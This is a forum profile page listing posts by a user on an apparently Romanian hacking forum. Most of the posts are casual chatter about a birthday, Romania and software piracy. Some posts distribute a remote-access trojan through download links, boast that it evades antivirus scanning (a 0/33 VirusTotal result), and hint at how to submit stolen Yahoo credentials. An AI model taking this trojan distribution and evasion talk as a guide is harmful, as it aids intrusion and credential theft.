Jump to content

Nytro

Administrators
  • Posts

    18795
  • Joined

  • Last visited

  • Days Won

    743

Everything posted by Nytro

  1. Try this : http://rapidshare.com/files/123498228/NyTrojan_RAT.rar Screenshot : http://img229.imageshack.us/img229/7069/screenshotrx0.jpg
  2. Scuze pentru dublu post , nu mai era deloc FUD , acum e din nou File NyTrOjan.ocx received on 06.28.2008 19:13:04 (CET) Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPED Result: 0/33 (0%) http://www.virustotal.com/analisis/450d9bd313ebcd461f0998ee05d6b82d Download : http://rapidshare.com/files/125661266/NyTrOjan.ocx
  3. Da dar am mai multe proiecte la care vreau sa lucrez , cand o sa am timp
  4. Nu destul de good
  5. Noh, salutare la toti! Mi-a facut placere sa fiu aici. Uita-ti un feedback pentru staff : Kw3rln - Great admin sysgh0st - N-am nimic impotriva cu el death - N-am nimic impotriva cu el Nemessis - African Idiot 100% Slick - Great admin Virgil - N-am nimic impotriva cu el Restul - N-am nimic impotriva cu ei V-am ajutat cat am putut : v-am zis cum sa ,,hack-uiti" automatul de cafea; v-am spus cum sa trisati Bitefight si v-am dat un chat (http://rstcenter.webs.com/ user:rstmember ; password:catamonia) . bye-bye au revoir Tsch?s adi?s arrivederci
  6. Dap , cea mai mare problema a Romaniei o reprezinta tiganii . Insa nu sunt toti la fel , de ce nu arata ce palate au unii ( si dorm in corturi ) ? Si cum de e rau sa fi taran in Romania , si nu e nimic rau in a fi fermier in america de exemplu ? Cum de e rau sa cresti animale in Romania si nu e rau in alte state ? Totul se rezuma la mentalitatea celor care ne critica , care nu stiu decat foarte putine despre Romania si acele putine lucruri pe care le stiu sunt de rau .
  7. Asta ar trebui sa vada retardatii care cred ca toti romanii sunt tigani , hoti , cersetori ... Sunt mandru ca sunt roman
  8. Nytro

    Yupyyyy

    Ndrey : Nu imi e chiar atat de foame Kenpachi : Dap , asta e , toti o sa murim . Ryuk : De 3 ori bani atunci Puscas_marin : Nu sunt gay . Ma vezi major peste un an La multi ani la mineee
  9. Nytro

    Yupyyyy

    Bani , femei si bautura
  10. Nytro

    Yupyyyy

    Danke , danke CODEX : Fac si eu ce pot Grunt : Nu stiu cat de util ar fi Ndrey : Nu prea imi place ideea de flood pe messenger
  11. O sa il vada din ce in ce mai multi antivirusi ...
  12. Nytro

    Yupyyyy

    Mersi tuturor shinnok : Bautura pe primu loc Kestor : Imi facusi foame demon_zone : Sa traim toti
  13. Nytro

    Yupyyyy

    DLD : Vine si alcoolu Z.treh : Mersi Ndrey : Happy la multi ani kw3rln : mersi , cea mai tare urare
  14. Nytro

    Yupyyyy

    Mersi mult . Oricum ma veti gasi aici si la 80 de ani
  15. Nytro

    Yupyyyy

    Azi implinesc 17 ani . Ce repede trece timpul ... Am imbatranit
  16. Pot face o versiune care sa nu fie detectata de nod , dar asta inseamna sa nu ruleze la startup .
  17. Tii PC deschis non-stop .
  18. Nici eu nu am dat nici un ban si cat timp se poate nu o sa dau . De ce sa dai bani pe ceva cand il poti avea si gratis , mai simplu si mai rapid ?
  19. Fac un exemplu in VB6 ( daca imi iese ) cand am timp
  20. Faceti un mic test : uitati-va la ce aveti in calculator incepand cu Windows , si calculati cati bani ati dat pentru : muzica , filme , jocuri ...
  21. Trimiti datele prin POST catre https://login.yahoo.com/config/login? , cu numele variabilelor login si passwd si valorile , datele de logare . Vezi in sursa la Yahoo! .
  22. Sony Ericsson T290i
  23. E keylogger nu trojan . Si antivirusul il detecteaza dinainte de a fi rulat . Succes DLD .
  24. Mersi . O sugestie pentru un program ?
  25. Da , cred ca v3.3 va fi gata pana vineri
×
×
  • Create New...